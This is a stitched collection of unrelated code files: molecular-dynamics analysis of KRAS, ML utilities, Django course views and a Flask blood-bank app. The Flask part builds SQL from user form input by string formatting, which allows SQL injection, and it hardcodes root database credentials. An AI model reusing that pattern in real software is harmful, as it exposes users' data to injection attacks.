krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(start_of_g+num_res))
krases0_BB.guess_bonds()
r2_26r40_56r69_166 = u.select_atoms('resid '+str(start_of_g)+':'+str(start_of_g+24)+' ' +\
str(start_of_g+38)+':'+str(start_of_g+54)+' ' +\
str(start_of_g+67)+':'+str(start_of_g+164)+\
' and (name CA or name BB)')
u_selection = \
'resid '+str(start_of_g)+':'+str(start_of_g+24)+' '+str(start_of_g+38)+':'+str(start_of_g+54)+' ' +\
str(start_of_g+67)+':'+str(start_of_g+164)+' and (name CA or name BB)'
mobile0 = u.select_atoms(str(u_selection)).positions - u.select_atoms(str(u_selection)).center_of_mass()
        # TODO: CS, something wrong with ref0 from get_ref_kras()
# just making ref0 = mobile0 to test for now
# ref0 = mobile0
# TSC removed this
R, RMSD_junk = align.rotation_matrix(mobile0, ref0)
######## TODO: TSC, Adjusted for AA lipid names ########
# lipids = u.select_atoms('resname POPX POPC PAPC POPE DIPE DPSM PAPS PAP6 CHOL')
lipids = u.select_atoms('resname POPC PAPC POPE DIPE SSM PAPS SAPI CHL1')
coords = ref0
RotMat = []
OS = []
r152_165 = krases0_BB.select_atoms('resid '+str(start_of_g+150)+':'+str(start_of_g+163)+' and (name CA or name BB)')
r65_74 = krases0_BB.select_atoms('resid '+str(start_of_g+63)+':'+str(start_of_g+72)+' and (name CA or name BB)')
timeframes = []
# TODO: CS, for AA need bonds to run make_whole()
# krases0_BB.guess_bonds()
# TODO: CS, turn off for now to test beyond this point
''' *** for AA, need to bring that back on once all else runs ***
'''
# @Tim and <NAME>. this was commented out - please check.
#make_whole(krases0_BB)
j, rmsd_junk = mda.analysis.align.rotation_matrix((r2_26r40_56r69_166.positions-r2_26r40_56r69_166.center_of_mass()), coords)
RotMat.append(j)
OS.append(r65_74.center_of_mass()-r152_165.center_of_mass())
timeframes.append(u.trajectory.time)
if protein_type == 'RAS-RAF':
z_pos = []
############### NEED TO CONFIRM THE SELECTION OF THE RAF LOOP RESIDUES BELOW ####################
############### TODO: TSC, zshifting is set to -1 (instead of -2), as there are ACE caps that are separate residues in AA
#zshifting=-1
if protein_x4 == 'rasraf':
zshifting = -1
elif protein_x4 == 'ras4araf':
zshifting = 0
else:
zshifting = 0
LOGGER.error('Found unsupported protein_x4 type')
raf_loops_selection = u.select_atoms('resid '+str(start_of_g+zshifting+291)+':'+str(start_of_g+zshifting+294)+' ' +\
str(start_of_g+zshifting+278)+':'+str(start_of_g+zshifting+281)+' ' +\
' and (name CA or name BB)')
############### NEED TO CONFIRM THE SELECTION OF THE RAF LOOP RESIDUES ABOVE ####################
diff = (lipids.center_of_mass()[2]-raf_loops_selection.center_of_mass(unwrap=True)[2])/10
if diff < 0:
diff = diff+(u.dimensions[2]/10)
z_pos.append(diff)
z_pos = np.array(z_pos)
RotMatNP = np.array(RotMat)
OS = np.array(OS)
OA = RotMatNP[:, 2, :]/(((RotMatNP[:, 2, 0]**2)+(RotMatNP[:, 2, 1]**2)+(RotMatNP[:, 2, 2]**2))**0.5)[:, None]
OWAS = np.arccos(RotMatNP[:, 2, 2])*180/math.pi
OC_temp = np.concatenate((OA, OS), axis=1)
t = ((OC_temp[:, 0]*OC_temp[:, 3])+(OC_temp[:, 1]*OC_temp[:, 4]) +
(OC_temp[:, 2]*OC_temp[:, 5]))/((OC_temp[:, 0]**2)+(OC_temp[:, 1]**2)+(OC_temp[:, 2]**2))
OC = OA*t[:, None]
ORS_tp = np.concatenate((OC, OS), axis=1)
ORS_norm = (((ORS_tp[:, 3]-ORS_tp[:, 0])**2)+((ORS_tp[:, 4]-ORS_tp[:, 1])**2)+((ORS_tp[:, 5]-ORS_tp[:, 2])**2))**0.5
ORS = (OS - OC)/ORS_norm[:, None]
OACRS = np.cross(OA, ORS)
OZCA = OA * OA[:, 2][:, None]
Z_unit = np.full([len(OZCA), 3], 1)
Z_adjust = np.array([0, 0, 1])
Z_unit = Z_unit*Z_adjust
Z_OZCA = Z_unit-OZCA
OZPACB = Z_OZCA/((Z_OZCA[:, 0]**2+Z_OZCA[:, 1]**2+Z_OZCA[:, 2]**2)**0.5)[:, None]
OROTNOTSIGNED = np.zeros([len(ORS)])
for i in range(len(ORS)):
OROTNOTSIGNED[i] = np.arccos(np.dot(OZPACB[i, :], ORS[i, :]) /
(np.sqrt(np.dot(OZPACB[i, :], OZPACB[i, :]))) *
(np.sqrt(np.dot(ORS[i, :], ORS[i, :]))))*180/math.pi
OZPACBCRS_cross = np.cross(OZPACB, ORS)
OZPACBCRS = OZPACBCRS_cross/((OZPACBCRS_cross[:, 0]**2+OZPACBCRS_cross[:, 1]**2+OZPACBCRS_cross[:, 2]**2)**0.5)[:, None]
OFORSIGN_temp = (OA - OZPACBCRS)**2
OFORSIGN = OFORSIGN_temp[:, 0]+OFORSIGN_temp[:, 1]+OFORSIGN_temp[:, 2]
OROT = OROTNOTSIGNED
for i in range(len(OROT)):
if OROT[i] < 0:
OROT[i] = -(OROT[i])
for i in range(len(OROT)):
if OFORSIGN[i] < 0.25:
OROT[i] = -(OROT[i])
###### Below introduces new shift to account for upper vs. lower leaflet #####
for i in range(len(OWAS)):
OWAS[i] = abs(-(OWAS[i])+180) # made this an absolute value so that the tilt remains positive
for i in range(len(OROT)):
if OROT[i] < 0:
OROT[i] = OROT[i]+180
elif OROT[i] > 0:
OROT[i] = OROT[i]-180
###### Above introduces new shift to account for upper vs. lower leaflet #####
###### Below might have to be updated to take into account the periodic nature of the rotation ######
if protein_type == 'RAS-ONLY':
states = np.zeros(len(OROT))
for j in range(len(OROT)):
diff0 = []
for i in range(len(RAS_ONLY_macrostate)):
#diff0.append([((RAS_ONLY_macrostate[i,0]-OWAS[j])**2+(RAS_ONLY_macrostate[i,1]-OROT[j])**2)**0.5, RAS_ONLY_macrostate[i,6]])
diff0.append([((RAS_ONLY_macrostate[i,1]-OWAS[j])**2+(RAS_ONLY_macrostate[i,0]-OROT[j])**2)**0.5, RAS_ONLY_macrostate[i,5]])
diff0.sort()
states[j] = diff0[0][1]
elif protein_type == 'RAS-RAF':
states = np.zeros(len(OROT))
for j in range(len(OROT)):
### below: adding in the requirements for the 'high-z' state ###
if (OROT[j] < -45 or OROT[j] > 140) and z_pos[j] > 4.8:
states[j] = 3
else:
### above: adding in the requirements for the 'high-z' state ###
diff0 = []
for i in range(len(RAS_RAF_macrostate)):
#diff0.append([((RAS_RAF_macrostate[i,0]-OWAS[j])**2+(RAS_RAF_macrostate[i,1]-OROT[j])**2)**0.5, RAS_RAF_macrostate[i,6]])
diff0.append([((RAS_RAF_macrostate[i,1]-OWAS[j])**2+(RAS_RAF_macrostate[i,0]-OROT[j])**2)**0.5, RAS_RAF_macrostate[i,4]])
diff0.sort()
states[j] = diff0[0][1]
###### Above might have to be updated to take into account the periodic nature of the rotation ######
###### Assume we want to remove this? Where is the code that reads this information? i.e. will there be knock-on effects? ######
###### If feedback code needs index 5 (two_states) from the output, deleting this four_states will shift that to index 4 #######
# four_states = np.zeros(len(OROT))
# for j in range(len(OROT)):
# diff0 = []
# for i in range(len(macrostate4)):
# diff0.append([((macrostate4[i,0]-OWAS[j])**2+(macrostate4[i,1]-OROT[j])**2)**0.5, macrostate4[i,6]])
# diff0.sort()
# four_states[j] = diff0[0][1]+1
###### below: old output details.... ######################################
###### Updated - RAS-only to NOT HAVE the Z-distance ######################
###### Updated - Added in the protein 'tag', i.e. RAS-ONLY or RAS-RAF #####
# OUTPUT = np.zeros([len(OROT), 6])
# for i in range(len(OROT)):
# OUTPUT[i] = timeframes[i], OWAS[i], OROT[i], z_pos[i], four_states[i], two_states[i]
###### above: old output details.... ######################################
###### below: NEW output details.... ######################################
if protein_type == 'RAS-ONLY':
OUTPUT = np.zeros([len(OROT), 6]).astype(object)
for i in range(len(OROT)):
OUTPUT[i] = str(protein_type), timeframes[i], OWAS[i], OROT[i], 'n/a', int(states[i])
elif protein_type == 'RAS-RAF':
OUTPUT = np.zeros([len(OROT), 6]).astype(object)
for i in range(len(OROT)):
OUTPUT[i] = str(protein_type), timeframes[i], OWAS[i], OROT[i], z_pos[i], int(states[i])
ALLOUT.append(OUTPUT)
return np.asarray(ALLOUT)
#np.savetxt(str(tpr)+"_tilt_rot_z_state.KRAS_"+str(k+1)+".txt", OUTPUT, fmt=['%i','%10.3f','%10.3f','%10.3f','%i','%i'], delimiter=' ')
|
StarcoderdataPython
|
1717103
|
<filename>src/simmate/toolkit/transformations/coordinate_perturation_ordered.py
# -*- coding: utf-8 -*-
from simmate.toolkit.transformations.base import Transformation
class CoordinateOrderedPerturbation(Transformation):
# known as "coordinate mutation" in USPEX
# site locations are mutated where sites with lower order have higher preference for mutation
# https://uspex-team.org/static/file/USPEX-LargeComplexSystems-2010.pdf
# ""Coordinate mutation was found [2] to be ineffective, because “blind” displacement of the
# atoms is much more likely to decrease the quality of a structure than to increase it.""
#!!! because of the quote above, the coordinate displacement is order-dependent
io_scale = "one_to_one"
ninput = 1
use_multiprocessing = False
def __init__(
self,
):
pass
def apply_transformation(self, structure, max_attempts=100):
return
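# --- Illustrative sketch only (not the USPEX/simmate implementation) ------------------
# One way an order-weighted coordinate perturbation could be written, assuming a
# pymatgen-like Structure and a caller-supplied per-site "order" array where a lower
# order marks a site as a better candidate for displacement. Every name below is
# hypothetical.
def _sketch_ordered_perturbation(structure, site_orders, max_displacement=0.2):
    """Displace each site by a random Cartesian vector scaled inversely with its order."""
    import numpy  # local import so the sketch stays self-contained
    new_structure = structure.copy()
    orders = numpy.asarray(site_orders, dtype=float)
    # lower order -> weight closer to 1 -> larger displacement
    spread = float(numpy.ptp(orders)) or 1.0
    weights = 1 - (orders - orders.min()) / spread
    for index, weight in enumerate(weights):
        direction = numpy.random.uniform(-1, 1, size=3)
        direction *= max_displacement * weight / (float(numpy.linalg.norm(direction)) or 1.0)
        new_structure.translate_sites([index], direction, frac_coords=False)
    return new_structure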
|
StarcoderdataPython
|
3216898
|
<reponame>glc12125/ML_for_trading
import numpy as np
class BagLearner(object):
def __init__(self, learner, kwargs={"leaf_size":1},bags=20,boost=False, verbose = False):
self.learner=learner
self.learner_list = []
for i in range(0,bags):
self.learner_list.append(learner(**kwargs))
self.bags = bags
# pass # move along, these aren't the drones you're looking for
def author(self):
return 'nmenon34' # replace tb34 with your Georgia Tech username
def addEvidence(self,dataX,dataY):
"""
@summary: Add training data to learner
@param dataX: X values of data to add
@param dataY: the Y training values
"""
index_list = np.linspace(0,dataX.shape[0]-1,dataX.shape[0])
index_list = index_list.astype(int)
for learner in self.learner_list:
index = np.random.choice(index_list,index_list.size)
learner.addEvidence(dataX.take(index,axis=0),dataY.take(index,axis=0))
def query(self,points):
"""
@summary: Estimate a set of test points given the model we built.
@param points: should be a numpy array with each row corresponding to a specific query.
@returns the estimated values according to the saved model.
"""
q=[]
for learner in self.learner_list:
q.append(learner.query(points))
q_array = np.array(q)
ans = np.mean(q_array,axis=0)
return ans.tolist()
if __name__=="__main__":
print "the secret clue is 'zzyzx'"
|
StarcoderdataPython
|
1658698
|
<filename>project_name/utils/__init__.py
from .download_utils import download_from_yaml
from .transform_utils import multi_page_table_to_list, write_node_edge_item
__all__ = [
"download_from_yaml", "multi_page_table_to_list", "write_node_edge_item"
]
|
StarcoderdataPython
|
3326812
|
<reponame>ranwise/djangochannel
from django.core.exceptions import ObjectDoesNotExist
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import permissions
from .models import Category, Course, Task, RealizationTask
from .serializers import (
CategorySerializer,
MinimalCourseSerializer, CourseSerializer, OutputCourseSer, ImageCourseSerializer,
MinimalTaskSerializer, FullTaskSerializer,
MinRealizationTaskSerializer, RealizationTaskSerializer, PatchRealizationTaskSerializer
)
class CategoryList(APIView):
"""Список всех категорий"""
permission_classes = [permissions.AllowAny]
@staticmethod
def get(request):
queryset = Category.objects.all()
serializer = CategorySerializer(queryset, many=True)
return Response({'categories': serializer.data})
class CoursesInCategory(APIView):
"""Список курсов в категории"""
permission_classes = [permissions.AllowAny]
@staticmethod
def get(request):
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
courses = Course.objects.filter(category_id=pk, is_active=True)
except ObjectDoesNotExist:
return Response('Нет категории', status=404)
serializer = ImageCourseSerializer(courses, many=True)
return Response({'courses': serializer.data})
class MyCourses(APIView):
"""Список курсов текущего юзера"""
permission_classes = [permissions.IsAuthenticated]
@staticmethod
def get(request):
courses = Course.objects.filter(students=request.user)
serializer = MinimalCourseSerializer(courses, many=True)
return Response({'courses': serializer.data})
class CourseTasks(APIView):
"""Задания курса"""
permission_classes = [permissions.IsAuthenticated]
@staticmethod
def get(request):
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
course = Course.objects.get(id=pk)
if request.user not in course.students.all():
return Response('Вы не записаны на этот курс', status=403)
course_ser = CourseSerializer(course)
except ObjectDoesNotExist:
return Response('Нет курса', status=404)
tasks = course.tasks.all()
tasks_ser = MinimalTaskSerializer(tasks, many=True)
confirmed, unconfirmed, next_task, status = CompletedTasks().get(request, course_pk=pk)
        # Possible statuses:
        # 200 - everything is OK,
        # 400 - no course pk,
        # 403 - the user is not enrolled in the course,
        # 404 - no such course.
if status != 200:
return Response(status=status)
return Response({'course': course_ser.data,
'tasks': tasks_ser.data,
'confirmed': confirmed,
'unconfirmed': unconfirmed,
'next': next_task})
class CourseDescription(APIView):
"""Описание курса"""
permission_classes = [permissions.AllowAny]
@staticmethod
def get(request):
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
course = Course.objects.get(id=pk)
except ObjectDoesNotExist:
return Response('Нет курса', status=404)
serializer = OutputCourseSer(course)
return Response({'course': serializer.data})
class Tasks(APIView):
"""
    Retrieve a task description
    and submit or update its answer
"""
permission_classes = [permissions.IsAuthenticated]
def get(self, request):
"""Получение описания задания"""
pk = request.GET.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
if self.check_user(request, pk) is False:
return Response('Это задание недоступно', status=404)
try:
task = Task.objects.get(id=pk)
except ObjectDoesNotExist:
return Response('Нет задания', status=404)
if request.user not in task.course.students.all():
return Response('Вы не записаны на этот курс', status=403)
answer = self.get_realization_task(task, request.user)
task_serializer = FullTaskSerializer(task)
return Response({'task': task_serializer.data,
'realization': answer})
@staticmethod
def get_realization_task(task, user):
"""Получение ответа на задание"""
try:
answer = task.answers.get(student=user)
return RealizationTaskSerializer(answer).data
except ObjectDoesNotExist:
return {}
def post(self, request):
"""Выполнение задания/изменение ответа"""
task_id = request.data.get('task')
if self.check_user(request, task_id) is False:
return Response('Не жульничай', status=404)
try:
answer = RealizationTask.objects.get(id=request.data.get("id"))
serializer = PatchRealizationTaskSerializer(answer, data=request.data)
except:
serializer = MinRealizationTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.save(student=request.user)
else:
return Response(serializer.errors, status=400)
return Response(status=200)
@staticmethod
def check_user(request, task_id):
"""
        Check the user for cheating,
        i.e. attempting tasks that are not yet available
"""
try:
course = Task.objects.get(id=task_id).course
except ObjectDoesNotExist:
return False
next_task = CompletedTasks().get_next_task(request, course_pk=course.id)
if next_task is not None and next_task.id < int(task_id):
return False
return True
class BuyCourse(APIView):
"""Покупка курса"""
    # TODO: For now this is done without any payment handling, just enrollment in the course
permission_classes = [permissions.IsAuthenticated]
@staticmethod
def post(request):
pk = request.data.get('pk', None)
if not pk:
return Response('Нет pk', status=400)
try:
course = Course.objects.get(id=pk)
except ObjectDoesNotExist:
return Response('Нет курса', status=404)
if request.user in course.students.all():
return Response('Вы уже записаны на курс {}'.format(course.title), status=422)
course.students.add(request.user)
return Response('Вы записались на курс {}'.format(course.title))
class CompletedTasks:
"""
    Retrieve the confirmed and unconfirmed tasks,
    and the next task to be completed
"""
def __init__(self):
self.confirmed_tasks = []
self.unconfirmed_tasks = []
self.next_task = None
def get(self, request, **kwargs):
        # Get the pk and check that it is present
course_pk = request.GET.get('course_pk')
if not course_pk:
course_pk = kwargs.get('course_pk')
if not course_pk:
return [], [], None, 400
        # Get the course
try:
course = Course.objects.get(id=course_pk)
except ObjectDoesNotExist:
return [], [], None, 404
        # Check that the user is among the course's students
if request.user not in course.students.all():
return [], [], None, 403
        # Get the confirmed tasks
self.confirmed_tasks = self.get_tasks(course, request.user, True)
ser_confirmed_data = MinimalTaskSerializer(self.confirmed_tasks, many=True).data
        # Get the unconfirmed tasks
self.unconfirmed_tasks = self.get_tasks(course, request.user, False)
ser_unconfirmed_data = MinimalTaskSerializer(self.unconfirmed_tasks, many=True).data
        # Get the next task to be completed
self.next_task = Task.objects.filter(
course=course
).exclude(
id__in=[x.id for x in self.confirmed_tasks]
).first()
next_task_data = MinimalTaskSerializer(self.next_task).data if self.next_task else None
return ser_confirmed_data, ser_unconfirmed_data, next_task_data, 200
@staticmethod
def get_tasks(course, user, success):
        # TODO: replace this query with a more correct one
answers = RealizationTask.objects.filter(
task__course=course, student=user, success=success)
return [x.task for x in answers]
def get_next_task(self, request, **kwargs):
self.get(request, **kwargs)
return self.next_task
|
StarcoderdataPython
|
1674033
|
<reponame>asbe/PoseCNN<gh_stars>0
import tensorflow as tf
from tensorflow.python.framework import ops
from . import hard_label_op
@ops.RegisterShape("Hardlabel")
def _hard_label_shape(op):
output_shape = op.inputs[0].get_shape()
return [output_shape]
@ops.RegisterGradient("Hardlabel")
def _hard_label_grad(op, grad):
bottom_prob = op.inputs[0]
bottom_gt = op.inputs[1]
threshold = op.get_attr('threshold')
# compute gradient
data_grad_prob, data_grad_gt = hard_label_op.hard_label_grad(bottom_prob, bottom_gt, grad, threshold)
return [data_grad_prob, data_grad_gt]
|
StarcoderdataPython
|
14629
|
from django.db.models.signals import m2m_changed
from django.dispatch import receiver
from .models import Image
@receiver(m2m_changed, sender=Image.users_likes.through)
def users_like_changed(sender, instance, **kwargs):
instance.total_likes = instance.users_likes.count()
instance.save()
|
StarcoderdataPython
|
4833249
|
<reponame>elsholz/PyMarkAuth
class Lines:
def __init__(self, *args):
c = ['\n']
for arg in args:
c.extend(['\n', arg])
c.extend(['\n'])
self.elements = c
def __str__(self):
return ''.join(str(x) for x in self.elements)
class Paragraphs:
def __init__(self, *args):
c = ['\n']
for arg in args:
c.extend(['\n\n', arg])
c.extend(['\n'])
self.elements = c
def __str__(self):
return ''.join(str(x) for x in self.elements)
class BlankSeparated:
def __init__(self, *args):
self.elements = args
def __str__(self):
return ' '.join(str(x) for x in self.elements)
|
StarcoderdataPython
|
1730781
|
from pymongo import MongoClient
client = MongoClient()
db = client.crandom
joke = {
"content": "从前有只麋鹿,它在森林里玩儿,不小心走丢了。于是它给它的好朋友长颈鹿打电话:“喂…我迷路啦。”长颈鹿听见了回答说:“喂,我长颈鹿啦~”",
"answer": "",
# "author": "",
# "via": "豆瓣",
# "via_url": "http://jandan.net/",
"rank": 5,
}
result = db.joke.insert_one(joke)
print(result.inserted_id)
|
StarcoderdataPython
|
3324463
|
from psypose.MEVA.meva.khrylib.utils.math import *
def get_body_qposaddr(model):
body_qposaddr = dict()
for i, body_name in enumerate(model.body_names):
start_joint = model.body_jntadr[i]
if start_joint < 0:
continue
end_joint = start_joint + model.body_jntnum[i]
start_qposaddr = model.jnt_qposadr[start_joint]
if end_joint < len(model.jnt_qposadr):
end_qposaddr = model.jnt_qposadr[end_joint]
else:
end_qposaddr = model.nq
body_qposaddr[body_name] = (start_qposaddr, end_qposaddr)
return body_qposaddr
def align_human_state(qpos, qvel, ref_qpos):
qpos[:2] = ref_qpos[:2]
hq = get_heading_q(ref_qpos[3:7])
qpos[3:7] = quaternion_multiply(hq, qpos[3:7])
qvel[:3] = quat_mul_vec(hq, qvel[:3])
def get_traj_pos(orig_traj):
traj_pos = orig_traj[:, 2:].copy()
for i in range(traj_pos.shape[0]):
traj_pos[i, 1:5] = de_heading(traj_pos[i, 1:5])
return traj_pos
def get_traj_vel(orig_traj, dt):
traj_vel = []
for i in range(orig_traj.shape[0] - 1):
vel = get_qvel_fd(orig_traj[i, :], orig_traj[i + 1, :], dt, 'heading')
traj_vel.append(vel)
traj_vel.append(traj_vel[-1].copy())
traj_vel = np.vstack(traj_vel)
return traj_vel
|
StarcoderdataPython
|
1722446
|
<gh_stars>0
from flask import Flask, render_template, json, request
from flaskext.mysql import MySQL
import mysql.connector
############# Helper functions
def delete_query(conn,cursor, table_name, col_name, ID):
query= "DELETE FROM {t} WHERE {c}={i}".format(t=table_name, c=col_name, i=ID)
cursor.execute(query)
conn.commit()
def make_list(known_values, problematic_values):
#known values is already a tuple. problematic values is a list.
list_of_tuples=[]
while None in problematic_values or "" in problematic_values:
if None in problematic_values:
problematic_values.remove(None)
if "" in problematic_values:
problematic_values.remove("")
for x in problematic_values:
list_of_tuples.append(known_values+(x,))
return list_of_tuples
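# Example (illustrative): make_list((5,), ["a", None, "", "b"]) returns [(5, "a"), (5, "b")]
# -- None and empty entries are dropped, and each remaining value is appended to the known tuple.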
def insert_query(conn, cursor, data, columns, table_name):
str_data="("
for x in data:
if type(x) is str:
str_data+= "'%s'" % x +","
continue
str_data+= str(x)+","
str_data=str_data[0:len(str_data)-1]+")"
query= "INSERT INTO {} {}".format(table_name, columns) +" "+"VALUES {}".format(str_data)
cursor.execute(query)
conn.commit()
def GetMaxID(conn, cursor, table_name, col_name): #get max ID of Acceptor/Donor, Flag=1= Donor, 2= Donor 3= Acceptor, 4= Blood Drive, 5= Sample, 6= Issue, 7= Pending Req
# Take table_name, id_col name and just %s it fam no need of flag
# needs connection and cursor object to MySQL as well. Returns 0 if null
query= ("SELECT IF (not exists(select {0} from {1} where {0}=1), 1,0)".format(col_name,table_name))
cursor.execute(query)
conn.commit()
result= cursor.fetchone()[0]
bank_id=0
if result==1:
bank_id=1
else:
query2= ("SELECT MAX({}) from {}".format(col_name,table_name))
cursor.execute(query2)
conn.commit()
bank_id= (cursor.fetchone()[0])
bank_id+=1
return bank_id
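# Example (illustrative): GetMaxID(conn, cursor, 'blood_bank', 'bank_id') returns 1 when no row
# with bank_id=1 exists, otherwise MAX(bank_id)+1.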
def get_ID(conn,cursor,table_name,col_name, condition_col, condition):
query= ("SELECT IF ( exists(select {0} from {1} where {2}={3}),1,0)".format(col_name,table_name,condition_col,condition))
cursor.execute(query)
conn.commit()
result= cursor.fetchone()
print (result)
if result[0]==1:
query= ("select {0} from {1} where {2}={3}".format(col_name,table_name,condition_col,condition))
cursor.execute(query)
conn.commit()
result1=cursor.fetchall()
result=[]
for i in result1:
result.append(i[0])
return tuple(result)
else:
return ()
############################################ starting flask app and connecting to MySQL
app = Flask(__name__)
mysql = MySQL()
_name=None
_email=None
_password=<PASSWORD>
data=None
app.config['MYSQL_DATABASE_USER'] = 'root'
app.config['MYSQL_DATABASE_PASSWORD'] = 'root'
app.config['MYSQL_DATABASE_DB'] = 'BBANK'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
######################### view functions
@app.route ("/SampleReq/<option>", methods=['GET','POST'])
def SampleReq(option):
if option=="Sample":
return render_template('IssueSample.html', who='Sample', redirect="/InsertBlood/Sample")
elif option=="Request":
return render_template('IssueSample.html', who='Request', redirect="/InsertBlood/Request")
#############################################################################################
@app.route("/InsertBlood/<option>", methods=['POST'])
def InsertBlood(option):
date=request.form['Date']
ID=None
conn= mysql.connect()
cursor= conn.cursor()
ID1=None
if option=="Sample":
ID= request.form['donorID']
table_name="blood_sample"
col_name="sample_id"
columns1="(sample_id,date_of_sample)"
ID1=GetMaxID(conn,cursor,table_name,col_name)
data1=(ID1,date)
columns="(sample_id, donor_id)"
data=(ID1, ID)
insert_query(conn,cursor,data,columns, table_name)
insert_query(conn,cursor,data1,columns1, "sample_dates")
query= R"SELECT blood_donor.donor_id, blood_acceptor.acceptor_id, pending_requests.Request_ID, pending_requests.DateOfRequest, blood_acceptor.blood_type from blood_donor inner join blood_acceptor inner join pending_requests on blood_donor.blood_type=blood_acceptor.blood_type and blood_acceptor.acceptor_id= pending_requests.acceptor_id"
cursor.execute(query)
conn.commit()
result= cursor.fetchall()
req_id=None
acceptor_id=None
date=""
print(ID)
print(type(ID))
if result[0][0]==None or result[0][0]=="":
for x in result:
print(type(x[0]))
if int(ID)==(x[0]):
print(x[0])
req_id=x[2]
acceptor_id=x[1]
date=x[3]
break
print(acceptor_id)
ID2= GetMaxID(conn,cursor,"Blood_issued", "issue_id")
insert_query(conn,cursor, (ID2, ID , acceptor_id), "(issue_id,donor_id,acceptor_id)", "Blood_issued")
insert_query(conn,cursor, (ID2,date), "(issue_id, dateofissue)", "issued_dates")
delete_query(conn,cursor, "blood_sample", "sample_id", ID1)
delete_query(conn,cursor, "pending_requests", "request_id", req_id)
elif option=="Request":
ID=request.form['AcceptorID']
table_name="Pending_requests"
col_name="request_id"
columns1=("sample_id","date_of_sample")
ID1=GetMaxID(conn,cursor,table_name,col_name)
data1=(ID1,date)
columns="(request_id, acceptor_id, dateofrequest)"
data=(ID1, ID, date)
# request table is ready to be inserted.
query="SELECT blood_type FROM blood_acceptor where acceptor_id={}".format(ID)
cursor.execute(query)
conn.commit()
blood_group=cursor.fetchone()[0]
query=R"SELECT IF ( EXISTS (SELECT blood_donor.donor_id from blood_donor INNER JOIN blood_sample ON blood_donor.donor_id=blood_sample.donor_id where"+ " blood_type= '{}'),1,0)".format(blood_group)
cursor.execute(query)
conn.commit()
check=cursor.fetchone()[0]
if check==0:
insert_query(conn,cursor,data,columns, table_name)
return "<h1> Request Added </h1"
else:
query=R"SELECT blood_donor.donor_id from blood_donor INNER JOIN blood_sample ON blood_donor.donor_id=blood_sample.donor_id where"+ " blood_type= '{}'".format(blood_group)
print(query)
cursor.execute(query)
conn.commit()
donor_id=cursor.fetchone()[0]
ID1=GetMaxID(conn,cursor,"Blood_issued","issue_id")
query= "SELECT sample_id from blood_sample where donor_id={}".format(donor_id)
cursor.execute(query)
conn.commit()
sample_id=cursor.fetchone()[0]
columns="(issue_id,donor_id,acceptor_id)"
data=(ID1, donor_id, ID)
insert_query(conn,cursor,data,columns, "Blood_issued")
insert_query(conn,cursor,(ID1,date), "(issue_id, dateofissue)", "issued_dates")
delete_query(conn,cursor, "blood_sample", "sample_id", sample_id)
return "<h1> Request fulfilled. Blood Issued. Issue ID: {} </h1>".format(ID1)
return render_template('return.html', myvar='insert', ID=ID1)
#######################################################################################################
@app.route("/Querie")
def Querie():
return render_template('Queries.html')
######################################################################################
@app.route("/InsertDrive", methods=['POST']) #Insert a Blood Drive
def InsertDrive():
bank_id, location= request.form['bankID'], request.form['Location']
start_date= request.form['SD']
end_date= request.form['ED']
conn= mysql.connect()
cursor=conn.cursor()
drive_id= GetMaxID(conn, cursor, "blood_drive", "drive_id")
data= (drive_id,bank_id,location, start_date, end_date)
columns= "(drive_id, bank_id, location, starting_date, ending_date)"
insert_query(conn,cursor,data,columns,"blood_drive")
return render_template('return.html', myvar= 'insert', ID=drive_id)
######################################################################################################################### Insert a Drive Donor
@app.route("/Insert_Drive_Donor", methods=['POST'])
def Insert_Drive_Donor():
drive_id, fname, gender, dob, BT= request.form['ID'], request.form['Fname'], request.form['gender'], request.form['dob'], request.form['BT']
donation_date=request.form['DD']
conn=mysql.connect()
cursor=conn.cursor()
donor_id= GetMaxID(conn,cursor,"blood_drive_donor","drive_donor_id")
data= (donor_id,drive_id,fname,gender,dob,BT,donation_date)
columns= "(drive_donor_id, drive_id, full_name, gender, dateofbirth, blood_type,donation_date)"
insert_query(conn,cursor,data,columns, "blood_drive_donor")
return render_template('return.html', myvar='insert', ID=donor_id)
######################################################################################################################### Insert an Acceptor
@app.route("/UpdatePerson", methods=['POST'])
def UpdatePerson():
return "<h1> IN PROGRESS</h1>"
############################################################################################################################### Insert a Donor
@app.route("/InsertPerson/<option>", methods=['POST'])
def InsertPerson(option):
table_name1,table_name2,table_name3,table_name4,table_name5,table_name6= (None,)*6
col_name=None
print(option)
columns_1, columns_2, columns_3, columns_4, columns_5= (None,)*5
if option.find("Acceptor")>=0:
table_name1,table_name2,table_name3,table_name4,table_name5= "blood_acceptor", "acceptor_email", "acceptor_address","acceptor_contact", "acceptor_bank"
table_name6="acceptor_diseases"
columns_1="(acceptor_id, full_name, gender, weight, blood_type, dateofbirth)"
columns_2="(acceptor_id, email)"
columns_3="(acceptor_id,address)"
columns_4="(acceptor_id,contact)"
columns_5="(acceptor_id,bank_id)"
col_name='acceptor_id'
columns_6="(acceptor_id,disease_id)"
else:
table_name1,table_name2,table_name3,table_name4,table_name5= "blood_donor", "donor_email", "donor_address","donor_contact", "donor_bank"
table_name6="donor_diseases"
columns_1="(donor_id, full_name, gender, weight, blood_type, dateofbirth)"
columns_2="(donor_id, email)"
columns_3="(donor_id,address)"
columns_4="(donor_id,contact)"
columns_5="(donor_id,bank_id)"
col_name='donor_id'
columns_6="(donor_id,disease_id)"
banks, full_name, gender, blood_type, weight, dob= request.form['banks'], request.form['inputfullname'], request.form['Gender'], request.form['BT'], request.form['WT'], request.form['DOB']
email1, email2, addr1, addr2, contact1, contact2= request.form['E1'], request.form['E2'], request.form['A1'], request.form['A2'], request.form['C1'], request.form['C2']
conn = mysql.connect()
cursor=conn.cursor()
Id=GetMaxID(conn, cursor, table_name1, col_name)
data=(Id, full_name, gender, weight, blood_type, dob)
data_email= make_list((Id,), [email1,email2])
data_addr= make_list((Id,), [addr1,addr2])
data_contact= make_list((Id,), [contact1,contact2])
banks= banks.split()
banks= [int(x) for x in banks]
data_bank= make_list((Id,), banks)
if option.find('Update')>=0:
Id= request.form['pk']
update_query(conn,cursor,data,columns_1,table_name1)
insert_query(conn,cursor,data,columns_1,table_name1)
d1= request.form.getlist('disease')
d1= [int(x[1]) for x in d1]
data_disease= make_list((Id,), d1)
if len(data_disease)==0:
